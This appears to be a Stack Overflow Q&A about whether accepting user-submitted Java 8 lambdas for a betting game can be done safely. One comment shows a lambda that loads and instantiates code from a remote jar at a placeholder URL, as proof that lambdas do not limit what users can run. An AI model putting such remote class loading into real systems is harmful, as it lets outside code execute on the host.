# Algorithmic betting game

Tags: java, security, java-8

i currently think about making a soccer betting game where users have to predict the results by submitting an algorithm.

Submitting an algorithm means implementing an interface (something like the following, i have to think about it in detail):

```
public interface Bet
{
  public Result makePrediction(Matchday m, History h, ...);
}
```

But if user get the possibility to implement an interface on their own, they can do nearly everything and it is a security problem.
Now i have seen the new functional features introduced by Java 8.
At the moment, i think about letting the user provide a lambda function which 'implements' the interface from above buts shrinks the number of possibilities.

A possible user input would be:

```
(Matchday m, History h, ...) 
  // apply algorithm
  -> {return f(m,h,...);}
```

and i would parse this and add it to my program. My question are now:

1. Does providing a lambda-function only limit the possibilities given by providing a complete implemented interface?
2. Is this still a security problem? Do i have to write my own compiler to restrict something else?

Comment: `(Matchday m, History h, ...)  -> (Result)new URLClassLoader(… "http://whateverILike/mycode.jar"…).loadClass(…).newInstance();`…

Answer (score 4, accepted):

Restricting user input to lambdas will not solve the problem. The lambda body can still contain any Java code you want. You even can define new classes inside the lambda body. There are various ways to solve your problem starting from learning about Java `SecurityManager` to running user code in sandboxed virtual machine (like KVM).

Comment: thanks for your answer, i will have a deeper look in Javas Security manager before i continue with developing